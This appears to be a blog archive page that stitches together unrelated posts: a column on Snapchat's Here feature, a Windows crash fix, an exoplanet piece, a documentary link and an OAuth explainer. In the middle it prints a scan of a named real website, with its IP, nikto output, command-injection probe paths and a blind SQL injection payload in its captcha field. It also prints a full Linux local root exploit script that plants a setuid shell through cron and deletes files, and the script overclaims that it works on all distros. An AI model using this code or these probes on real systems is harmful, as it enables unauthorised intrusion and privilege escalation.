Snapchat’s latest feature shows why IT must tame marketing’s inner monster

By Evan Schuman, Computerworld |  Mobile & WirelessMarketingSnapchat
Add a comment

Marketing has gone gaga over social media. (Come to think of it, gaga may be marketing’s default state.) Marketers being who they are, they are trying to figure out ways to use social media to control consumers and bend them to their will. As they seek to do that, they will look to IT to make their visions reality. It’s up to the adults in IT to inject some rationality into those discussions.

What brings this to mind is an interesting and deliriously over-the-top feature announced by Snapchat on May 1 and called simply Here. The intent of the program is innocuous enough. It’s supposed to allow people to pop up on your mobile screen without the phone ringing and — here’s the tricky part — without you agreeing to it. If you have ever seen marketers in action, you can probably see why I think this will appeal to them.

The video that Snapchat made shows how the program would work when everything goes perfectly. And it indeed looks like an attractive feature if you buy into Snapchat’s assumptions about how people should interact. As a Business Insider piece described it: “It’s all part of Snapchat’s strategy called ‘Here,’ which strives to make all users feel like their friends are constantly present and attentive.”

The catch is that friends — especially the rather all-encompassing definition of friends adopted by users of Snapchat and other social media — are in fact not constantly present and attentive. What better way to drive that point home than to force people to make a binary choice: interact with me now or not at all?

Snapchat differentiated its original photo-messaging service with its Mission: Impossible twist: Photos and videos vanished 10 seconds after they were viewed by the recipient. The Here Feature introduces social risks, though. With the original service, you sent an image, and if it was ignored, no one was insulted. But the more personal and real-time the conversation attempt, the more insulting it will feel when it’s ignored or rejected. Bizarrely enough, this is why email is arguably the most polite of communication methods. You can send an email whenever it suits you, and it quietly and politely waits until the recipient has the time to deal with it. With Here, you show up on the recipient’s screen instantly, and the recipient is either going to start to talk to you right then or just swipe you away into non-existence. Ouch!

Here’s the IT headache. This is going to plant ideas into the heads of your marketing counterparts. “Gee, I’d love to be able to pop up on the screens of our customers whenever I want. Make that happen, IT. Of course you can do it. Snapchat’s already done it.” (As a grown-up, you will want to resist the urge to respond, “And if Facebook jumped off the Empire State Building . . . ?”)

Most people have a bit of niceness and politeness inside of them. It’s socialized into us as we learn to avoid being rejected a lot. Marketers, though, seem to have no fear of rejection. Only they could routinely send out hundreds of thousands of emails and be thrilled with a 1% response rate. The prospect of being turned down again and again via an instant video-communication app is not going to faze them.

This is why, when I heard about Here, I thought about how dangerous it could be in the hands of the marketing department. People who have no compunction about telephoning millions of people during the dinner hour are not going to resist a technology that will let them instantly show up on the phones of customers, even though those customers might get annoyed if they are driving, going to the bathroom or just watching TV. If their conscience won’t stop them, you need to. Sorry, but there’s a price for having grown up.

Evan Schuman has covered IT issues for a lot longer than he’ll ever admit. The founding editor of retail technology site StorefrontBacktalk, he’s been a columnist for CBSNews.com, RetailWeek and eWeek. Evan can be reached at eschuman@thecontentfirm.com and he can be followed at twitter.com/eschuman. Look for his column every Tuesday.

Read more about bring your own device (byod) in Computerworld’s Bring Your Own Device (BYOD) Topic Center.

Originally published on Computerworld |  Click here to read the original story.

Quote  —  Posted: May 14, 2014 in Vulnerablities
Tags: , , ,

 

If you experience an problem with Windows explorer, crashing (restarting) and “checking for solutions” frequently, please check your event log (start menu – Control Panel\All Control Panel Items\Administrative Tools\event viewer) and check your system for details:

Error 1000

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0×1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:\Windows\explorer.exe
Faulting module path: C:\Program Files\DivX\DivX Plus Media Foundation Components\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary Solution – Uninstall Divx

As you can see, the problem can easily be rectified, but only if you know what your doing. The conflicting / manifested dll or other file, could be malware or linked to a bigger program.

p.s this error had to be placed here as the Microsoft site has changed to only promote bug reports on, evaluating software only :)

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

Index.php Header contains a expireiry date that has long been and gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>

Blindsqli in captcha!

During a few scans with backtrack, heres a vulnerability I found it their site, This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Exported HTTP Request from W3AF</title>
    </head>
    <body><form action="
http://ncc.co.uk/index.php" method="POST">
<label>
website</label>
<input type="text" name="website" value="
http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I’m home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>

19 Items found, to be suspected vulnerabilities

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
—————————————————————————
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
—————————————————————————
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1′, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
—————————————————————————
+ 1 host(s) tested

Screenshot

# Date: 6/26/12
# Version: 3.x.x
# Category:: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + effected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others …
# ~
# Use this at your own risk, I’m not responsible for any risk.
# sorchfox@hotmail.com

cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include

char *payload=”\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n”;

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir(“/etc/cron.d”);
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system(“/bin/sh”);
system(“rm -rf /tmp/s”);
system(“rm -rf /etc/cron.d/*”);
return 0;
}
__EOF__
echo “wait aprox 4 min to get sh”
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

This might be even better than Kepler 22b! An alien exoplanet has been discovered, which resembles our own Earth the most. It is the best bet scientists are putting forward for a planet outside our own Solar System that is capable of harbouring liquid water. It lies in just the right zone – called the Goldilocks Zone – at the perfect distance away from its parent star and might even be congenial enough to harbour life of the form we see on Earth. It is also our next door neighbour, being just 22 light years away. The planet is christened GJ 667C.

An artist’s impression

Just to give you a sense of how close GJ677C is, consider the fact that there are only 100 stars closer to Earth than this planet. The planet occurs bang in the middle of the Goldilocks zone, as Steven Vogt, astronomer at the University of California, Santa Cruz, emphatically stresses in an interview to space.com:

It’s right smack in the habitable zone – there is no question or discussion about it. It’s not on the edge, it’s right in there!

The planet is about 4.5 times the size of Earth, but is not gaseous. It is rocky, having a composition similar to that of Earth. It orbits its parent star in only 28 days. The parent star is one of a triple-star system, which by itself is a nice fact about this planetary system. The star is a faint M-star, but still visible from Earth. This faintness of the star explains the fact the planet is quite close to the star – as indicated by its small orbital period – while still being in the Goldilocks zone, which is in itself a first instance. It just shows that there are systems which, otherwise deemed boring, might be worth checking.

The sight of the sky from GJ667C should be great! It’s parent star is one of a triple-star system, which means that apart from its own sun, the planet’s sky has two more suns, which are also just far enough to not destabilize the orbit or burn up the planet. Vogt does the explanation again:

The planet is around one star in a triple-star system. The other stars are pretty far away, but they would look pretty nice in the sky.

The study was published in Astrophysical Journal Letters.

How To Build A Dinosaur

Posted: February 5, 2012 in Documentaries

Watch the doc here…

How to build a dino

http://feeds.topdocumentaryfilms.com/~r/TopDocumentaryFilms/~3/7h6_ivXsoJY/

2-legged vs. 3-legged OAuth

Posted: January 12, 2012 in Uncategorized
Tags:

From emails I receive it seems like there is a bit of confusion about what the terms 2-legged OAuth and 3-legged OAuth mean. I hope I can clear up this confusion with this article (and don’t contribute more to the confusion…).
In short, they describe two different usage scenarios of OAuth involving two respectively three parties.
3-legged OAuth describes the scenario for which OAuth was originally developed: a resource owner wants to give a client access to a server without sharing his credentials (i.e. username/password). A typical example is a user (resource owner) who wants to give a third-party application (client) access to his Twitter account (server).
On a conceptual level it works in the following way:
Client has signed up to the server and got his client credentials (also known as “consumer key and secret”) ahead of time
User wants to give the client access to his protected resources on the server
Client retrieves the temporary credentials (also known as “request token”) from the server
Client redirects the resource owner to the server
Resource owner grants the client access to his protected resources on the server
Server redirects the user back to the client
Client uses the temporary credentials to retrieve the token credentials (also known as “access token”) from the server
Client uses the token credentials to access the protected resources on the server
2-legged OAuth , on the other hand, describes a typical client-server scenario, without any user involvement. An example for such a scenario could be a local Twitter client application accessing your Twitter account.
On a conceptual level 2-legged OAuth simply consists of the first and last steps of 3-legged OAuth:
Client has signed up to the server and got his client credentials (also known as “consumer key and secret”)
Client uses his client credentials (and empty token credentials) to access the protected resources on the server
Above I used Twitter as an example, though strictly speaking, they don’t use 2-legged OAuth, but a variant of it. They not only provide the client credentials but also the token credentials (see also Using one access token with OAuth ).
As you have seen, 2-legged OAuth is nothing new, it is simply using OAuth in a different scenario than it was designed for. And hence you can use (almost?) all existing OAuth libraries for 2-legged OAuth, too.